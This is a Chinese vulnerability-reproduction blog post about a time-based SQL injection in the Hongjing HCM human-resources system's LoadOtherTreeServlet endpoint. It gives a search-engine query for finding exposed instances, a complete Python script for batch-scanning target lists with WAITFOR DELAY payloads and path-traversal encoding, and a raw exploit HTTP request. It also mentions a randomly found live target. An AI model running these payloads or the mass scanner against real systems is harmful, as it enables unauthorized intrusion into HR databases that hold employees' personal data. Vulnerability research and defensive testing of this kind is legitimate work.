【漏洞复现】宏景HCM-LoadOtherTreeServlet SQL注入

声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

宏景HCM人力资源信息管理系统是一个全面的人力资源管理软件,它覆盖了人力资源管理的各个模块。该系统旨在帮助企事业单位建立高效的组织,促进组织的健康发展,并增强组织的软实力。然而,该系统的LoadOtherTreeServlet接口存在安全问题,因为它没有对传入的数据进行预编译和充分的验证,这导致了SQL注入漏洞的存在。

二、资产收集

1.使用网络空间测绘引擎搜索

**鹰图检索:**app.name="宏景 HCM"

2.使用poc批量扫描

python 复制代码
import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning

RED = '\033[91m'  # 定义红色字体的ANSI转义码
RESET = '\033[0m'  # 定义重置颜色的ANSI转义码
# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def check_vulnerability(url):
    try:
        # 构造完整的攻击URL
        attack_url = url.rstrip('/') + "/w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A4%27--&flag=1"
        attack_payload = """usertable=h00&usernumber=1&i9999=-1';WAITFOR+DELAY+'0:0:6'--+"""

        headers = {
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        start_time = time.time()  # 记录开始时间
        response = requests.post(attack_url, headers=headers, data=attack_payload, verify=False, timeout=10)  # 发送POST请求
        elapsed_time = time.time() - start_time  # 计算请求耗时

        if 4 < elapsed_time < 6:  # 如果耗时在4到6秒之间,可能存在漏洞
            print(f"{RED}URL [{url}] 可能存在宏景HCM-LoadOtherTreeServlet-sql注入漏洞{RESET}")
        else:
            print(f"URL [{url}] 不存在漏洞")
    except requests.exceptions.Timeout:  # 捕获超时异常
        print(f"URL [{url}] 请求超时,可能存在漏洞")
    except requests.RequestException as e:  # 捕获其他请求异常
        print(f"URL [{url}] 请求失败: {e}")

def main():
    parser = argparse.ArgumentParser(description='检测目标地址是否宏景HCM-LoadOtherTreeServlet-sql注入漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    args = parser.parse_args()

    if args.url:  # 如果提供了单个URL参数
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    elif args.file:  # 如果提供了包含多个URL的文件参数
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

if __name__ == '__main__':
    main()

cmd运行:python poc.py -f url.txt

随机寻找的幸运儿

三、漏洞复现

1.构造数据包

html 复制代码
GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A4%27--&flag=1 HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

2.数据包分析

  1. 请求方法:GET
  2. 请求路径:/w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A4%27--&flag=1
  3. HTTP版本:HTTP/1.1
  4. Host头:ip(目标服务器的IP地址)
  5. User-Agent头:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0(表示客户端使用的浏览器和操作系统信息)
  6. Accept头:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8(表示客户端接受的内容类型及其优先级)
  7. Accept-Language头:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2(表示客户端接受的语言及其优先级)
  8. Accept-Encoding头:gzip, deflate, br(表示客户端接受的编码方式)
  9. Connection头:close(表示请求完成后关闭连接)

/w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet,在解码后,URL路径变为:/w_selfservice/oauthservlet/././gz/LoadOtherTreeServlet

请求还包含以下参数:

  • modelflag=4:可能是用于指定某种模式或配置的标志。
  • budget_id=1)WAITFOR+DELAY+'0:0:4'--&flag=1:其中budget_id的值被设置为1,后面跟着一段SQL语句(WAITFOR DELAY '0:0:4'),如果SQL语句被正常执行则延时4秒

3.结束跑路

执行成功,延时1秒。

执行成功,延时4秒。

**每篇一言:**风月折断杨柳枝,琴瑟朝露挥掷成诗。

相关推荐
hefaxiang24 分钟前
[Mysql] Mysql的多表查询----多表关系(下)
数据库·mysql
夜魔00939 分钟前
SQLite3 JDBC Java工具类
java·数据库·sqlite·工具类·sqliteutile
m 哆哆.ღ41 分钟前
【Python进阶】Python中的数据库交互:使用SQLite进行本地数据存储
数据库·python·交互
EasyCVR1 小时前
ISUP协议视频平台EasyCVR私有化部署视频平台如何实现RTMP推流将大疆无人机的视频画面回传?
服务器·网络·数据库·人工智能·音视频·无人机
乐维_lwops1 小时前
网络安全:数字时代的守护盾
运维·网络
挥剑决浮云 -1 小时前
Linux 网络编程
linux·运维·c语言·网络·笔记
写bug的小屁孩1 小时前
基于HTTP编写ping操作
服务器·c语言·网络·c++·网络协议·http·qt6.3
孤蓬&听雨1 小时前
http自动发送请求工具(自动化测试http请求)
网络·自动化测试·网络协议·http·http请求
牛马小风1 小时前
️虚拟机配置NAT和Bridge模式
网络·智能路由器·桥接模式
亚力山大抵2 小时前
网络学习第四篇
网络·华为snap·静态路由配置·华为实验